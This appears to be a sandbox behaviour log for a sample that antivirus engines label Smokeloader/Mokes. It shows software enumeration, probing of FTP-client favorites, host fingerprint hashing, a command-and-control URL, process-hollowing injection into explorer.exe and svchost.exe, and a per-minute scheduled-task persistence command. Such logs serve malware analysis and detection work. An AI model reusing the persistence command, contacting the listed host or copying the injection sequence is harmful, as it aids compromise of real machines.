regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
file C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\
file C:\ProgramData\SmartFTP\Client 2.0\Favorites\
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
url http://18.230.108.113/smk/
Time & API Arguments Status Return Repeated

CryptHashData

 buffer: TEST22-PC285808797C6024AD
hash_handle: 0x003b3c20
flags: 0
1 1 0

CryptHashData

 buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000002ff4c0
flags: 0
1 1 0

CryptHashData

 buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520
hash_handle: 0x00000000002ff4c0
flags: 0
1 1 0
file C:\Users\test22\AppData\Roaming\130083.exe:Zone.Identifier
file C:\Users\test22\AppData\Roaming\Microsoft\egirwvbj\htgaceru.exe:Zone.Identifier
Process injection Process 1280 resumed a thread in remote process 2396
Process injection Process 2724 resumed a thread in remote process 2772
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2396
1 0 0

NtResumeThread

 thread_handle: 0x00000050
suspend_count: 1
process_identifier: 2772
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000f0
suspend_count: 1
process_identifier: 1280
1 0 0

CreateProcessInternalW

 thread_identifier: 2400
thread_handle: 0x00000108
process_identifier: 2396
current_directory:
filepath:
track: 1
command_line: explorer.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

NtMapViewOfSection

 section_handle: 0x00000120
process_identifier: 2396
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x000f0000
allocation_type: 0 ()
section_offset: 0
view_size: 40960
process_handle: 0x00000114
1 0 0

NtUnmapViewOfSection

 base_address: 0x006c0000
region_size: 4096
process_identifier: 2396
process_handle: 0x00000114
1 0 0

NtMapViewOfSection

 section_handle: 0x0000011c
process_identifier: 2396
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x006c0000
allocation_type: 0 ()
section_offset: 0
view_size: 2625536
process_handle: 0x00000114
1 0 0

NtResumeThread

 thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2396
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2396
1 0 0

CreateProcessInternalW

 thread_identifier: 2672
thread_handle: 0x000002a8
process_identifier: 2668
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\8E9A.tmp.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000002b4
1 1 0

CreateProcessInternalW

 thread_identifier: 2728
thread_handle: 0x000002c4
process_identifier: 2724
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\9263.tmp.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000002c0
1 1 0

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000178
suspend_count: 1
process_identifier: 2668
1 0 0

CreateProcessInternalW

 thread_identifier: 2864
thread_handle: 0x0000000000000358
process_identifier: 2860
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000360
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000574
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

 thread_handle: 0x000000000000077c
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000794
suspend_count: 1
process_identifier: 2668
1 0 0

CreateProcessInternalW

 thread_identifier: 2776
thread_handle: 0x00000050
process_identifier: 2772
current_directory:
filepath:
track: 1
command_line: svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000054
1 1 0

NtMapViewOfSection

 section_handle: 0x0000004c
process_identifier: 2772
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x000b0000
allocation_type: 0 ()
section_offset: 0
view_size: 16384
process_handle: 0x00000054
1 0 0

NtUnmapViewOfSection

 base_address: 0x00710000
region_size: 4096
process_identifier: 2772
process_handle: 0x00000054
1 0 0

NtMapViewOfSection

 section_handle: 0x0000005c
process_identifier: 2772
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00710000
allocation_type: 0 ()
section_offset: 0
view_size: 32768
process_handle: 0x00000054
1 0 0

NtResumeThread

 thread_handle: 0x00000050
suspend_count: 1
process_identifier: 2772
1 0 0
Lionic Trojan.Win32.Mokes.m!c
Cynet Malicious (score: 100)
CAT-QuickHeal Backdoor.Mokes
Skyhigh BehavesLike.Win32.RAHack.lc
ALYac Gen:Variant.Barys.54521
Cylance Unsafe
VIPRE Gen:Variant.Barys.54521
Sangfor Trojan.Win32.Agent.Ajob
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Barys.54521
K7GW Trojan-Downloader ( 0057091f1 )
K7AntiVirus Trojan-Downloader ( 0057091f1 )
Arcabit Trojan.Barys.DD4F9
VirIT Trojan.Win32.Dnldr26.OCK
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Smokeloader.C
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Malware.Barys-7603348-0
Kaspersky Backdoor.Win32.Mokes.ataj
Alibaba Backdoor:Win32/Mokes.70f98fcc
NANO-Antivirus Trojan.Win32.TP.feyjkz
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
MicroWorld-eScan Gen:Variant.Barys.54521
Rising Downloader.Dofoil!8.322 (TFE:2:caB8BM3MItT)
Emsisoft Gen:Variant.Barys.54521 (B)
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.DownLoader26.9526
McAfeeD Real Protect-LS!77947379B9E2
Trapmine malicious.high.ml.score
CTX exe.trojan.mokes
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.77947379b9e26603
Jiangmin Trojan.Generic.bwvia
Google Detected
Avira TR/Crypt.XPACK.Gen
Antiy-AVL Trojan/Win32.AGeneric
Kingsoft Win32.Hack.Mokes.ataj
Gridinsoft Ransom.Win32.Zbot.sa
Xcitium TrojWare.Win32.Spy.Zbot.AAT@1ozvx8
Microsoft TrojanDownloader:Win32/Dofoil.AC
GData Gen:Variant.Barys.54521
Varist W32/Agent.CC.gen!Eldorado
AhnLab-V3 Trojan/Win32.Smokeldr.C2402258
McAfee GenericRXWQ-AU!77947379B9E2
TACHYON Backdoor/W32.Mokes.13824
DeepInstinct MALICIOUS
VBA32 Trojan.Downloader